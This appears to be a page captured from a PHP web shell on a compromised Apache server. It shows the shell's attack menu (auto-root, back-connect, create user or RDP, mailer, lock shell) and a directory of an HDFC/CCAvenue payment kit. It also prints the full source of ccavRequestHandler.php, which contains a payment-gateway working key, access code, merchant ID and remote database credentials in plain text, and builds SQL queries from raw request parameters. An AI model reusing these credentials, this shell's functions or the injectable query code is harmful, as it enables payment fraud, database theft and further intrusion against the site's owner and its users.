Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.218.50.170
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gfgcg /
hdfc /
[ HOME SHELL ]
Name
Size
Permission
Action
CUSTOM_CHECKOUT_FORM_KIT
[ DIR ]
drwxr-xr-x
IFRAME_KIT
[ DIR ]
drwxr-xr-x
NON_SEAMLESS_KIT
[ DIR ]
drwxr-xr-x
Screens
[ DIR ]
drwxr-xr-x
Crypto.php
1.99
KB
-rwxr-xr-x
ccavRequestHandler.php
3.48
KB
-rwxr-xr-x
ccavRequestHandler.php~
978
B
-rwxr-xr-x
ccavResponseHandler.php
5.89
KB
-rwxr-xr-x
ccavResponseHandler.php~
1.41
KB
-rwxr-xr-x
dataFrom.htm
19.25
KB
-rwxr-xr-x
dataFrom.htm~
19.01
KB
-rwxr-xr-x
forgotpassword.php
2.55
KB
-rwxr-xr-x
from.html
644
B
-rwxr-xr-x
jquery-1.7.2.min.js
92.62
KB
-rwxr-xr-x
json.js
3.27
KB
-rwxr-xr-x
sendmobotp.php
2.53
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccavRequestHandler.php
<html> <head> <title> Custom Form Kit </title> </head> <body> <center> <?php include('Crypto.php')?> <?php error_reporting(0); $merchant_data=''; $working_key='B600FDBF3FCBA75FD14C622ADA90FF5B';//Shared by CCAVENUES $access_code='AVZM02FL41AW97MZWA';//Shared by CCAVENUES $appno = $_GET['productinfo']; $funivcode = $_GET['funivcode']; $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /*$servername = "localhost"; $username = "root"; $password = "";*/ $dbname = "logisys3_comexam"; $conn = new mysqli($servername, $username, $password, $dbname); $get_data = "select * from dbname where ifnull(fdeleted,'') <> 'T'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { // output data of each row $dbnames = array(); while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; } } mysqli_close($conn); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /*$servername = "localhost"; $username = "root"; $password = "";*/ $dbname = $dbnames[$funivcode]; $conn = new mysqli($servername, $username, $password, $dbname); //IFNULL(cs.ftotalfee,0) $get_data = "select cf.fcollcode, IFNULL(cf.famount,0) as famount, cl.fcollname,control.funivname,pdf_logo_path, IFNULL(cl.fmobile,'') as fmobileno,IFNULL(cl.femail,'') as femail from control, collfundtransfer cf inner join college cl on cl.fcollcode = cf.fcollcode where fid = '{$appno}'"; //var_dump($get_data); $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { // var_dump($row); $fregno = $row['fcollcode']; $ftotalfee = $row['famount']; $fname = $row['fcollname']; $fmobileno = $row['fmobileno']; $femail = $row['femail']; $funivname = $row['funivname']; $logo = $row['pdf_logo_path']; } } $_POST['merchant_id'] = '195905'; $number = rand(10000000,99999999); $orderid = "HDFC".$number; $_POST['order_id'] = $orderid; $update_order_query = "update collfundtransfer set forderid = '{$orderid}' where fid = '{$appno}'"; $res_update = $conn->query($update_order_query); $_POST['currency'] = 'INR'; $_POST['amount'] = $ftotalfee; $protocol = stripos($_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://'; $_POST['redirect_url'] = $protocol."universitysolutions.in/bcu/hdfc/ccavResponseHandler.php"; $_POST['cancel_url'] = $protocol."universitysolutions.in/bcu/hdfc/ccavResponseHandler.php"; $_POST['language'] = 'EN'; $_POST['billing_name'] = $fname; $_POST['billing_tel'] = $fmobileno; $_POST['billing_email'] = $femail; // merchant_param1 $_POST['merchant_param1'] = $funivcode; $_POST['merchant_param2'] = $fregno; $_POST['merchant_param3'] = $appno; // var_dump($_POST); // die(); foreach($_POST as $key => $value){ $merchant_data .= $key.'='.urlencode($value).'&'; } // var_dump($merchant_data);die(); $encrypted_data=encrypt($merchant_data,$working_key); // Method for encrypting the data. // var_dump($encrypted_data); ?> <form method="post" name="redirect" action="https://test.ccavenue.com/transaction/transaction.do?command=initiateTransaction"> <?php echo "<input type=hidden name=encRequest value=$encrypted_data>"; echo "<input type=hidden name=access_code value=$access_code>"; ?> </form> </center> <script language='javascript'>document.redirect.submit();</script> </body> </html>
Close
